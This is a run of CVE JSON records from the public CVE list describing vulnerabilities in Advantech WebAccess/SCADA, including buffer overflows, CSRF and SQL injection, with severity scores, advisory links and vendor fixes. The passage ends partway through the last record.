{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T11:01:14.512Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02" }, { "name": "105736", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/105736" }, { "name": "1041957", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1041957" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess Versions 8.3.2 and prior.", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Versions 8.3.2 and prior." } ] } ], "datePublic": "2018-10-29T00:00:00", "descriptions": [ { "lang": "en", "value": "WebAccess Versions 8.3.2 and prior. The application fails to properly validate the length of user-supplied data, causing a buffer overflow condition that allows for arbitrary remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-30T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02" }, { "name": "105736", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/105736" }, { "name": "1041957", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1041957" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2018-17910", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess Versions 8.3.2 and prior.", "version": { "version_data": [ { "version_value": "WebAccess Versions 8.3.2 and prior." } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "WebAccess Versions 8.3.2 and prior. The application fails to properly validate the length of user-supplied data, causing a buffer overflow condition that allows for arbitrary remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02" }, { "name": "105736", "refsource": "BID", "url": "http://www.securityfocus.com/bid/105736" }, { "name": "1041957", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1041957" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-17910", "datePublished": "2018-10-29T18:00:00", "dateReserved": "2018-10-02T00:00:00", "dateUpdated": "2024-08-05T11:01:14.512Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38389
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:37:16.503Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "lessThanOrEqual": "9.02", "status": "affected", "version": "All", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Natnael Samson, @NattiSamson, working with Trend Micro\u2019s Zero Day Initiative, reported these vulnerabilities to CISA." } ], "datePublic": "2021-10-12T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess versions 9.02 and prior are vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute code." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2021-10-18T12:41:14", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02" } ], "solutions": [ { "lang": "en", "value": "Advantech has released Version 9.1.1 to address the stack-based buffer overflow vulnerability." } ], "source": { "advisory": "ICSA-21-285-02", "discovery": "UNKNOWN" }, "title": "Advantech WebAccess", "x_generator": { "engine": "Vulnogram 0.0.9" }, "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2021-10-12T19:15:00.000Z", "ID": "CVE-2021-38389", "STATE": "PUBLIC", "TITLE": "Advantech WebAccess" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_affected": "\u003c=", "version_name": "All", "version_value": "9.02" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "credit": [ { "lang": "eng", "value": "Natnael Samson, @NattiSamson, working with Trend Micro\u2019s Zero Day Initiative, reported these vulnerabilities to CISA." } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess versions 9.02 and prior are vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute code." } ] }, "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02", "refsource": "MISC", "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02" } ] }, "solution": [ { "lang": "en", "value": "Advantech has released Version 9.1.1 to address the stack-based buffer overflow vulnerability." } ], "source": { "advisory": "ICSA-21-285-02", "discovery": "UNKNOWN" } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2021-38389", "datePublished": "2021-10-18T12:41:14.173603Z", "dateReserved": "2021-08-10T00:00:00", "dateUpdated": "2024-09-16T22:24:38.131Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-33023
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T23:42:19.157Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "lessThanOrEqual": "9.02", "status": "affected", "version": "All", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Natnael Samson, @NattiSamson, working with Trend Micro\u2019s Zero Day Initiative, reported these vulnerabilities to CISA." } ], "datePublic": "2021-10-12T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess versions 9.02 and prior are vulnerable to a heap-based buffer overflow, which may allow an attacker to remotely execute code." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-122", "description": "HEAP-BASED BUFFER OVERFLOW CWE-122", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2021-10-18T12:41:08", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02" } ], "solutions": [ { "lang": "en", "value": "In order to address the heap-based buffer overflow vulnerability, Advantech recommends users directly add the remote access code to avoid being attacked by unknown requests. This is the remote access code established during installation of the Advantech WebAccess SCADA software (SCADA node, project node, or OPC Service) on the OPC Server computer. The access code you enter here must match the remote access code established during installation on the OPC Server. This prevents unauthorized users from accessing the OPC Server data using the Advantech WebAccess SCADA OPC Service.\n\nIf you have forgotten the remote access code using during software installation on the OPC Server node, you have two options:\n\nRe-install the Advantech WebAccess SCADA software on the OPC Server node to change it and edit it to match in your database.\nEdit the BWSERVER.INI file on the OPC Server node and edit it to match in your database using UPDATE." } ], "source": { "advisory": "ICSA-21-285-02", "discovery": "UNKNOWN" }, "title": "Advantech WebAccess", "x_generator": { "engine": "Vulnogram 0.0.9" }, "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2021-10-12T19:15:00.000Z", "ID": "CVE-2021-33023", "STATE": "PUBLIC", "TITLE": "Advantech WebAccess" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_affected": "\u003c=", "version_name": "All", "version_value": "9.02" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "credit": [ { "lang": "eng", "value": "Natnael Samson, @NattiSamson, working with Trend Micro\u2019s Zero Day Initiative, reported these vulnerabilities to CISA." } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess versions 9.02 and prior are vulnerable to a heap-based buffer overflow, which may allow an attacker to remotely execute code." } ] }, "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "HEAP-BASED BUFFER OVERFLOW CWE-122" } ] } ] }, "references": { "reference_data": [ { "name": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02", "refsource": "MISC", "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02" } ] }, "solution": [ { "lang": "en", "value": "In order to address the heap-based buffer overflow vulnerability, Advantech recommends users directly add the remote access code to avoid being attacked by unknown requests. This is the remote access code established during installation of the Advantech WebAccess SCADA software (SCADA node, project node, or OPC Service) on the OPC Server computer. The access code you enter here must match the remote access code established during installation on the OPC Server. This prevents unauthorized users from accessing the OPC Server data using the Advantech WebAccess SCADA OPC Service.\n\nIf you have forgotten the remote access code using during software installation on the OPC Server node, you have two options:\n\nRe-install the Advantech WebAccess SCADA software on the OPC Server node to change it and edit it to match in your database.\nEdit the BWSERVER.INI file on the OPC Server node and edit it to match in your database using UPDATE." } ], "source": { "advisory": "ICSA-21-285-02", "discovery": "UNKNOWN" } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2021-33023", "datePublished": "2021-10-18T12:41:08.470089Z", "dateReserved": "2021-05-13T00:00:00", "dateUpdated": "2024-09-17T03:49:19.278Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2015-3946
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T06:04:00.958Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Cross-site request forgery (CSRF) vulnerability in Advantech WebAccess before 8.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-01-15T02:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2015-3946", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Cross-site request forgery (CSRF) vulnerability in Advantech WebAccess before 8.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2015-3946", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-05-12T00:00:00", "dateUpdated": "2024-08-06T06:04:00.958Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-12022
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-128-01 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-598/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess Node |
Version: WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:48:57.655Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-598/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An improper validation vulnerability exists that could allow an attacker to inject specially crafted input into memory where it can be executed." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-129", "description": "IMPROPER VALIDATION OF ARRAY INDEX CWE-129", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-05-08T20:06:04", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-598/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-12022", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Node", "version": { "version_data": [ { "version_value": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An improper validation vulnerability exists that could allow an attacker to inject specially crafted input into memory where it can be executed." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER VALIDATION OF ARRAY INDEX CWE-129" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-598/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-598/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-12022", "datePublished": "2020-05-08T11:38:54", "dateReserved": "2020-04-21T00:00:00", "dateUpdated": "2024-08-04T11:48:57.655Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2015-3947
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T06:04:02.496Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "SQL injection vulnerability in Advantech WebAccess before 8.1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-01-15T02:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2015-3947", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "SQL injection vulnerability in Advantech WebAccess before 8.1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2015-3947", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-05-12T00:00:00", "dateUpdated": "2024-08-06T06:04:02.496Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-3954
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2019-28 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess/SCADA |
Version: 8.4.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:26:27.557Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2019-28" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess/SCADA", "vendor": "n/a", "versions": [ { "status": "affected", "version": "8.4.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.0 allows a remote, unauthenticated attacker to execute arbitrary code by sending a crafted IOCTL 81024 RPC call." } ], "problemTypes": [ { "descriptions": [ { "description": "Stack-based Buffer Overflow", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-06-18T23:16:31", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2019-28" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "ID": "CVE-2019-3954", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess/SCADA", "version": { "version_data": [ { "version_value": "8.4.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.0 allows a remote, unauthenticated attacker to execute arbitrary code by sending a crafted IOCTL 81024 RPC call." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Stack-based Buffer Overflow" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2019-28", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2019-28" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2019-3954", "datePublished": "2019-06-18T23:16:31", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-08-04T19:26:27.557Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-7497
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T06:31:03.819Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several untrusted pointer dereference vulnerabilities have been identified, which may allow an attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-822", "description": "UNTRUSTED POINTER DEREFERENCE CWE-822", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-7497", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several untrusted pointer dereference vulnerabilities have been identified, which may allow an attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "UNTRUSTED POINTER DEREFERENCE CWE-822" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-7497", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-02-26T00:00:00", "dateUpdated": "2024-09-17T01:51:04.478Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0857
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.zerodayinitiative.com/advisories/ZDI-16-121 | x_refsource_MISC | |
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-107 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-119 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.129Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-121" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-107" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-119" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Multiple heap-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-01T15:57:02", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-121" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-107" }, { "tags": [ 